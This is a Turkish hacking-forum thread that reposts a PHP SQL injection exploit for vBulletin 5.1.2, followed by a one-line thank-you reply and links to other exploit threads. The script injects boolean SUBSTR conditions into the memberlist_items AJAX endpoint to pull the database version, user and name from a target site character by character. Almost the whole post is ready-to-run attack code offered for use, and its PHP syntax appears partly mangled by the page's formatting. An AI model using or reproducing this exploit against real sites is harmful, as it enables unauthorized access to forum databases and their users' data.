Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
vBulletin 5.1.2 SQL Injection Exploit
#1





PHP Kod:
<?php

/*
Author: Nytro
Powered by: Romanian Security Team
Price: Free. Educational.
*/


error_reporting(E_ALL);
ini_set('display_errors'1);


// Get arguments


$target_url = isset($argv[1]) ? $argv[1] : 'https://rstforums.com/v5';
$expression str_replace('/''\\/'$target_url);


// Function to send a POST request


function httpPost($url,$params)
{
$ch curl_init($url);


curl_setopt($chCURLOPT_URL,$url);
curl_setopt($chCURLOPT_RETURNTRANSFER,true);
curl_setopt($chCURLOPT_HEADERfalse);
curl_setopt($chCURLOPT_SSL_VERIFYPEERfalse);
curl_setopt($chCURLOPT_POST1);
curl_setopt($chCURLOPT_POSTFIELDS$params);

curl_setopt($chCURLOPT_HTTPHEADER, array(
'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
'Accept: application/json, text/javascript, */*; q=0.01',
'X-Requested-With: XMLHttpRequest',
'Referer: https://rstforums.com/v5/memberlist',
'Accept-Language: en-US,en;q=0.5',
'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;'
));


$output curl_exec($ch);

if(
$output == FALSE) print htmlspecialchars(curl_error($ch));


curl_close($ch);
return 
$output;
}


// Function to get string between two other strings


function get_string_between($string$start$end)
{
$string " ".$string;
$ini strpos($string,$start);
if (
$ini == 0) return "";
$ini += strlen($start);
$len strpos($string,$end,$ini) - $ini;
return 
substr($string,$ini,$len);
}


// Get version


print "\r\nRomanian Security Team - vBulltin 5.1.2 SQL Injection\r\n\r\n";
print 
"Version: ";


$result httpPost($target_url '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),1 
,1)--+"+' 
.
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


$letter 1;


while(
strpos($result'No Users Matched Your Query') == false)
{
$exploded explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' $expression
'\/member\/'$result);


$username get_string_between($exploded[1], '">''<\/a>');
print 
$username[0];

$letter++;
$result httpPost($target_url '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version( ),' .
$letter ',1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}


// Get user


print "\r\nUser: ";


$result httpPost($target_url '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),1 
,1)--+"+' 
.
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


$letter 1;


while(
strpos($result'No Users Matched Your Query') == false)
{
$exploded explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' $expression
'\/member\/'$result);


$username get_string_between($exploded[1], '">''<\/a>');
print 
$username[0];


$letter++;
$result httpPost($target_url '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),' $letter
',1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}


// Get database


print "\r\nDatabse: ";


$result httpPost($target_url '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(), 
1,1)--+"+' 
.
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


$letter 1;


while(
strpos($result'No Users Matched Your Query') == false)
{
$exploded explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' $expression
'\/member\/'$result);


$username get_string_between($exploded[1], '">''<\/a>');
print 
$username[0];


$letter++;
$result httpPost($target_url '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(), ' .
$letter ',1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}


print 
"\r\n"


?>
Beğenenler:
#2
Teşekkürler Hocam.
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  Joomla Com_Cckjseblod Auto Exploiter FTP Config İndirme Exploit KingSkrupellos 12 243 01-12-2016, Saat: 08:35
Son Yorum: the_zizil
  Perl ve Python Exploit Bilgisi Anlatım Part 1 Takisik 2 224 23-11-2016, Saat: 08:38
Son Yorum: KingSkrupellos
  Linux x86_64 Privilege Escalation Local Root Exploit KingSkrupellos 1 73 08-11-2016, Saat: 16:09
Son Yorum: RedLife
  İşinize Yarayacak Önemli 5 Exploit AhmetBey 0 22 07-11-2016, Saat: 23:46
Son Yorum: AhmetBey
  Asan/Suid Local Root Exploit KingSkrupellos 0 24 28-10-2016, Saat: 08:28
Son Yorum: KingSkrupellos
Anahtar Kelimeler

vBulletin 5.1.2 SQL Injection Exploit indir, vBulletin 5.1.2 SQL Injection Exploit Videosu, vBulletin 5.1.2 SQL Injection Exploit Online izle, vBulletin 5.1.2 SQL Injection Exploit Bedava indir, vBulletin 5.1.2 SQL Injection Exploit Yükle, vBulletin 5.1.2 SQL Injection Exploit Hakkında, vBulletin 5.1.2 SQL Injection Exploit Nedir, vBulletin 5.1.2 SQL Injection Exploit Free indir, vBulletin 5.1.2 SQL Injection Exploit Oyunu, vBulletin 5.1.2 SQL Injection Exploit Download


1 Ziyaretçi